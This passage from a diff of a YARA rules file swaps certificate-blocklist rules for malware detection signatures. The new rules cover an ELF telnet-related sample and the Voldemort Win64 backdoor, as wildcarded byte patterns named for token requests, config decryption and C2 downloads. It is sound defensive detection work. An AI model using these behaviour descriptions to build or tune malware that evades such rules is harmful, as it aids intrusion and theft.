+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 DF BB ?? ?? ?? ?? 48 89 C2 48 8D 05 ?? ?? ?? ?? 48 89 D1 E8
+            ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 48 89
+            4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
+            9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ??
+            ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 49 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54
+            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF
+            ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 90 48 8D 05 ?? ??
+            ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 50 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48
+            8B 54 24 ?? 48 89 10 90 EB ?? 48 89 C7 48 8B 54 24 ?? E8 ?? ?? ?? ?? 31 DB 48 8D 0D
+            ?? ?? ?? ?? 48 89 C7 31 C0 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 5C
+        }
+		$network_communication_tcp_p2 = {
+            24 ?? 48 89 44 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 31 C0 48
+            8D 5C 24 ?? B9 ?? ?? ?? ?? 48 89 CF E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 4C 24 ?? 48 89 48 ?? 83 3D ?? ??
+            ?? ?? ?? 90 75 ?? 48 8B 54 24 ?? 48 89 50 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 58 ?? EB
+            ?? 48 8D 78 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48 8B 9C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 31 C9 31 FF 48 8B AC 24 ??
+            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? E8 ??
+            ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24
+        }
+		$telnet_task_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
+            ?? 4C 89 54 24 ?? 4C 89 5C 24 ?? 48 89 9C 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 4C
+            89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4F ?? 48 89 F0 FF D1 48 89 C3 31
+            C0 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24
+            ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            48 8D 8C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 90 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ??
+            48 89 4C 24 ?? 48 B9 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 4C 24 ?? 90 48 C7 44 24 ?? ?? ??
+            ?? ?? C6 44 24 ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 48 8D 05 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 8C 24 ?? ?? ?? ?? 48 89
+            48 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 50 ?? 48 8B 54 24 ??
+            48 89 50 ?? EB ?? 48 8D 78 ?? 48 8B 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48
+            8B 54 24 ?? E8 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ??
+            ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 C3 48 8D 8C 24 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? 48 89 FE 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 94 24 ?? ??
+            ?? ?? 48 85 D2 74 ?? 48 8B 8C 24 ?? ?? ?? ?? 31 DB E9 ?? ?? ?? ?? 44 0F 11 7C 24
+        }
+		$telnet_task_p2 = {
+            48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 1D ??
+            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ??
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B
+            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 0F 1F 40 ?? E8 ?? ?? ??
+            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 74 24 ?? 48 83 C6 ?? 48 89
+            CB 48 89 F1 48 89 5C 24 ?? 48 89 4C 24 ?? 0F 10 01 0F 11 84 24 ?? ?? ?? ?? 0F 10 41
+            ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84
+            24 ?? ?? ?? ?? 48 8B 44 24 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ??
+            0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24
+            ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 1D
+            ?? ?? ?? ?? 48 89 C1 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 94
+            24 ?? ?? ?? ?? 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24
+            ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89
+            54 24 ?? 4C 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ??
+            48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Paper Comercial Ltda" and pe.signatures [ i ] . serial == "07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $get_local_address_p* ) ) and ( all of ( $get_mac_address_p* ) ) and ( all of ( $network_communication_tcp_p* ) ) and ( all of ( $telnet_task_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Voldemort : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Voldemort backdoor."
 		author = "ReversingLabs"
-		id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "d770bd79-5141-50a0-8cf7-bca1cf5f23e1"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L621-L637"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.Voldemort.yara#L1-L208"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1fe2abe17436d2965e34d1f10223af50d9600809fdef234e7d89c74fa33228a9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Voldemort"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOX Entertainment Co., Ltd" and pe.signatures [ i ] . serial == "4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "43cce248-2322-5607-8706-aeab046a30b9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L639-L655"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$decrypt_configuration_p1 = {
+            4C 8B DC 55 56 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 49
+            89 5B ?? 33 F6 49 89 7B ?? 4D 89 6B ?? 48 89 4C 24 ?? 66 C7 44 24 ?? ?? ?? C6 44 24
+            ?? ?? E8 ?? ?? ?? ?? 4C 8B E8 8B FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B E8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 45 33 C9 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
+            CD C7 44 24 ?? ?? ?? ?? ?? 45 8D 41 ?? FF D0 48 89 44 24 ?? 48 8B F8 48 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 33 D2 48 8B CF FF D0 44 8B E0 EB
+            ?? 44 8B E6 89 74 24 ?? FF 15 ?? ?? ?? ?? 45 8B C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
+            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 8B F0 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0
+            74 ?? 4C 8D 4C 24 ?? 48 89 74 24 ?? 45 8B C4 49 8B D6 48 8B CF FF D0 8B FE 45 85 E4
+            0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 44 8B C6 48 8D 54 24
+        }
+		$decrypt_configuration_p2 = {
+            0F 1F 84 00 ?? ?? ?? ?? 0F B6 0A 8B C7 FF C7 42 3A 0C 30 0F 85 ?? ?? ?? ?? 41 FF C0
+            48 FF C2 41 83 F8 ?? 72 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 42 8B 2C 37 4C 89 BC 24 ?? ??
+            ?? ?? 8D 5D ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ??
+            48 8B D8 85 ED 74 ?? 8D 47 ?? 03 C5 41 3B C4 73 ?? 49 8D 56 ?? 44 8B C5 48 03 D7 48
+            8B CB E8 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 66 90 49 FF C0 43
+            38 34 28 75 ?? 85 ED 7E ?? 4C 8B CB 8B C6 4D 8D 49 ?? 99 FF C6 41 F7 F8 48 63 C2 42
+            0F B6 14 28 41 30 51 ?? 3B F5 7C ?? 48 8B 4C 24 ?? 4C 8B C5 48 8B D3 E8 ?? ?? ?? ??
+            48 8B 6C 24 ?? BE ?? ?? ?? ?? EB ?? 41 3B FC 0F 82 ?? ?? ?? ?? 48 8B DE 4C 8B A4 24
+            ?? ?? ?? ?? 4D 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4D 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ??
+            ?? 4C 8B B4 24 ?? ?? ?? ?? 48 85 DB 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C3 33 D2 48 8B C8
+            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
+            D0 48 8B CB E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B CF FF D0 48
+            8B BC 24 ?? ?? ?? ?? 48 85 ED 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C5 33 D2 48 8B C8 FF 15
+            ?? ?? ?? ?? 8B C6 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E 5D
+            C3
+        }
+		$decryption_algorithm = {
+            40 53 48 83 EC ?? 0F B6 01 48 8B D9 84 C0 0F 84 ?? ?? ?? ?? 48 FF C3 48 89 7C 24 ??
+            4C 8B C9 8B F8 3C ?? 72 ?? 83 E7 ?? B9 ?? ?? ?? ?? 0F 1F 00 0F B6 13 48 FF C3 8B C2
+            83 E0 ?? D3 E0 83 C1 ?? 0B F8 80 FA ?? 73 ?? 33 C0 4C 8B C3 4D 2B C1 4C 3B CB 4C 0F
+            47 C0 4D 85 C0 74 ?? 33 D2 49 8B C9 E8 ?? ?? ?? ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ??
+            85 C0 7E ?? 48 89 74 24 ?? 48 8B FB 8B F0 66 90 48 8B D7 E8 ?? ?? ?? ?? 48 83 C7 ??
+            48 83 EE ?? 75 ?? 48 8B 74 24 ?? 48 8B C3 48 8B 7C 24 ?? 48 83 C4 ?? 5B C3 48 8B 7C
+            24 ?? 48 8B C3 48 83 C4 ?? 5B C3
+        }
+		$request_access_token_p1 = {
+            40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            33 C4 48 89 84 24 ?? ?? ?? ?? 33 C0 4C 89 4C 24 ?? 33 FF 48 89 44 24 ?? 0F 57 C0 89
+            7C 24 ?? 48 C7 C3 ?? ?? ?? ?? 8B F7 49 8B E8 4C 8B FA 4C 8B F1 48 8B C3 0F 11 44 24
+            ?? 48 FF C0 42 38 34 00 75 ?? 48 8B CB 48 FF C1 40 38 34 0A 75 ?? 48 03 C1 48 8B CB
+            48 FF C1 41 38 34 0E 75 ?? 48 03 C1 4C 8D 24 C5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4D 8B
+            C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 74 ?? 48 89 6C 24 ??
+            4C 8D 05 ?? ?? ?? ?? 4D 8B CE 4C 89 7C 24 ?? 49 8B D4 48 8B C8 E8 ?? ?? ?? ?? 4C 8D
+            0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85 C0 75 ?? 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 8D 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CD FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48
+            8B 6C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CD 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? FF D0
+        }
+		$request_access_token_p2 = {
+            85 C0 0F 84 ?? ?? ?? ?? 49 8B D5 48 8B CD E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ??
+            ?? ?? ?? 48 8B D3 66 90 48 FF C2 40 38 3C 10 75 ?? 48 FF C2 48 8B C8 E8 ?? ?? ?? ??
+            4C 8B F0 48 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85
+            C0 74 ?? 83 78 ?? ?? 75 ?? 48 8B 48 ?? 48 8B FB 80 7C 39 ?? ?? 48 8D 7F ?? 75 ?? FF
+            15 ?? ?? ?? ?? 4C 8D 47 ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 ?? 4C
+            8B C3 48 8B F8 0F 1F 00 49 FF C0 42 80 3C 02 ?? 75 ?? 49 FF C0 48 8B C8 E8 ?? ?? ??
+            ?? 49 8B CE E8 ?? ?? ?? ?? 48 85 FF 74 ?? 80 7C 1F ?? ?? 48 8D 5B ?? 75 ?? 48 8D 53
+            ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B 4C 24 ?? BB ?? ?? ?? ?? 48 89 01 EB ?? 8B 5C 24 ??
+            EB ?? 8B DF EB ?? 8B DE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 74 ?? FF 15 ?? ?? ??
+            ?? 4D 8B C5 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4C 8B
+            C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C7 33 D2
+            48 8B C8 FF 15 ?? ?? ?? ?? 8B C3 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D 5B C3
+        }
+		$network_communication_p1 = {
+            40 53 56 57 41 54 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24
+            ?? 8B 35 ?? ?? ?? ?? 48 8B F9 48 8D 0D ?? ?? ?? ?? 4D 8B E1 4D 8B F8 4C 8B F2 E8 ??
+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 6C 24 ?? E8 ??
+            ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 33 DB 48 85 C0 0F 84 ?? ?? ?? ?? 45 33
+            C9 89 5C 24 ?? 45 33 C0 48 8D 0D ?? ?? ?? ?? 8B D6 FF D0 48 89 07 48 8B E8 48 85 C0
+            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 85 C0
+            0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 45 33 C9 49 8B D6 48 8B CD FF D0 48 89 47 ?? 48
+        }
+		$network_communication_p2 = {
+            8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
+            ?? ?? ?? 48 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ??
+            ?? ?? 48 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 4D 8B C7 49 8B
+            D4 48 89 5C 24 ?? 48 8B CD FF D0 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 5F ?? C7 44 24
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B D0 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 41 B9 ?? ?? ?? ??
+            4C 8D 44 24 ?? 48 8B CB 41 8D 51 ?? FF D0 B8 ?? ?? ?? ?? EB ?? 48 89 5F ?? EB ?? 48
+            89 1F 33 C0 48 8B 6C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
+            41 5E 41 5C 5F 5E 5B C3
+        }
+		$download_data_from_c2_p1 = {
+            4C 8B DC 55 56 57 49 8D AB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
+            33 C4 48 89 85 ?? ?? ?? ?? 49 89 5B ?? 33 FF 4D 89 63 ?? 48 8B D9 4D 89 6B ?? 48 8D
+            0D ?? ?? ?? ?? 4D 8B E8 4D 89 73 ?? 0F 57 C0 4D 89 7B ?? 33 C0 4C 8D 67 ?? 4D 8B C1
+            48 89 44 24 ?? 0F 11 44 24 ?? 8B F7 E8 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8B F8 48 85 C0
+            0F 84 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 4C 8B CB 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D
+            45 ?? 49 8B DC 0F 1F 80 ?? ?? ?? ?? 48 FF C3 66 39 34 58 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D
+            55 ?? 49 8B CF 41 B9 ?? ?? ?? ?? 44 8B C3 FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ??
+            45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49
+            8B CD FF D0 4C 8B E0 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48
+        }
+		$download_data_from_c2_p2 = {
+            8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 45 33 C9 89 7C 24
+            ?? 45 33 C0 33 D2 89 7C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C
